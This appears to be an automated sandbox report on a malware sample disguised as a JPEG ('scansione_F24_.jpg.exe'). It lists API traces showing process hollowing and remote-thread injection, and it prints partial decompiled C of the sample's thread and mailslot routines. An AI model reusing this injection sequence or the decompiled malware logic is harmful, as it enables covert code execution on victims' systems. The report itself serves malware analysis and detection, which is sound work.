  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1535, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61 Total matches: 2
Similarity
  • Total matches: 2
  • API ID: RtlFreeAnsiStringRtlUpcaseUnicodeString
  • String ID: pnls
  • API String ID: 1759152104-141991303
  • Opcode ID: 1b851152067a6db6879b83e6b25959da6169a9d8602d5776354d9100e82b9d64
  • Instruction ID: c9f23dce73c85179fe8b2af871d3216cca9706f8479e6acea818e7f13d9a5d0a
  • Opcode Fuzzy Hash: C7E02B414545A2D794036880C3546C667839757705F0CE50181C6E49591E24747BFF48
  • Instruction Fuzzy Hash: c9f23dce73c85179fe8b2af871d3216cca9706f8479e6acea818e7f13d9a5d0a
APIs
  • RtlUpcaseUnicodeString.NTDLL(?,002E74CC,00000001), ref: 002E1561
    • Part of subcall function 002E1395: memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E1395: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
    • Part of subcall function 002E1395: GetLastError.KERNEL32(00000001), ref: 002E1422
    • Part of subcall function 002E1395: HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E2427: OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
    • Part of subcall function 002E2427: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
    • Part of subcall function 002E2427: CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
    • Part of subcall function 002E2427: GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E2427: CloseHandle.KERNEL32(?), ref: 002E24E0
    • Part of subcall function 002E2427: GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
  • RtlFreeAnsiString.NTDLL(?), ref: 002E15DF
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: scansione_F24_.jpg.exe Analysis ID: 68428

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:E5C7B986B6FD3733504DB3FD6D6FAADA
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:68428
Initial sample SHA 256:9D2D7459EDA5BC0063FC6EF47DE20AFBFA28AA6981F0EE63D90AE3E10EC4F835
Initial sample name:scansione_F24_.jpg.exe

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
